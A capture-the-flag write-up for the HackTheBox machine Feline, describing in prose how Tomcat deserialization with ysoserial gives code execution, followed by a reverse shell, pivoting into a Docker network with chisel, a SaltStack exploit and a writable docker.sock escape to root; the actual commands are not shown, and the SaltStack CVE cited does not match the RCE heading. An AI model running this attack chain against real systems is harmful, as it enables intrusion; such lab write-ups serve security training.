HackTheBox - Feline
Rustscan results
I am gonna use rustscan today to scan all the ports. It is one of the most powerful tool used nowadays to scan the all the ports in no time. It is comparatively faster than nmap.
It then runs nmap scan on the discovered ports to identify the services and version number.
Apache Tomcat is running on 8080 with a version number of 9.0.27
Checking out the web server
We have a file upload functionality at /service/index.html. The website is about adding email attachments to scan for viruses.
If we try to mess with the upload feature, we get the following error.
Apache Tomcat RCE by deserialization
Keeping that in mind, let's proceed. We can search for tomcat vulnerabilities on CVE MITRE. After searching on MITRE and google, I found this vulnerability. Read what the vulnerability is and how it was patched. We know the upload file location and also we can control the Cookie, that means we can exploit it.
Prerequisites (Taken from here)
There are a number of prerequisites for this vulnerability to be exploitable.
The
PersistentManageris enabled and it’s using aFileStoreThe attacker is able to upload a file with arbitrary content, has control over the filename and knows the location where it is uploaded
There are gadgets in the
classpaththat can be used for a Java deserialization attack
Creating Payload using ysoserial.jar
We need ysoserial.jar file to create a malicious file that we can upload to get RCE. Github repo is here and the package can be downloaded from here.
I will be using CommonsCollections2 payload to generate a Java serialized data.
Getting Reverse shell
Now that we have code execution, let's get a reverse shell. We will need two payloads, one to download the shell file and another one to execute it.
Scanning the docker0 interface using nmap (Host Discovery)
We have docker0 interface running on the machine where we can search for more hosts. I will use static nmap binary to scan on that network.
Port scanning on docker container
We get a new host having IP Address of 172.17.0.2 which is a docker container running some kind of service. I will also scan for ports on this IP. A simple bash script to scan all the ports.
Saltstack runs on port 4505 and 4506 (salt-master). Saltstack is a management software and remote execution engine widely used in devops field. Read more about it over here.
Forwarding ports using chisel
Firstly we need to forward all the ports using chisel. The ports that we are interested in are 4505 and 4506.
Our Local machine
Victim's machine
To check if it worked or not, we can use netstat command.
Saltstack 3000.1 - Remote Code Execution
A vulnerability, named CVE-2020-28243, was identified as a privilege escalation bug impacting SaltStack Salt minions. This allowed an unprivileged user to create files in any non-blacklisted directory via a command injection in a process name.
Get the code for exploit from here and as we already have 4505 and 4506 listening, we can run the script.
Writable docker socket (docker.sock)
As we have access to the docker.sock file, we can exploit it and probably get root access on host system. For that we need to understand all the docker endpoints on creating and managing containers.
Mounting the root (host) into the container
Last updated
Was this helpful?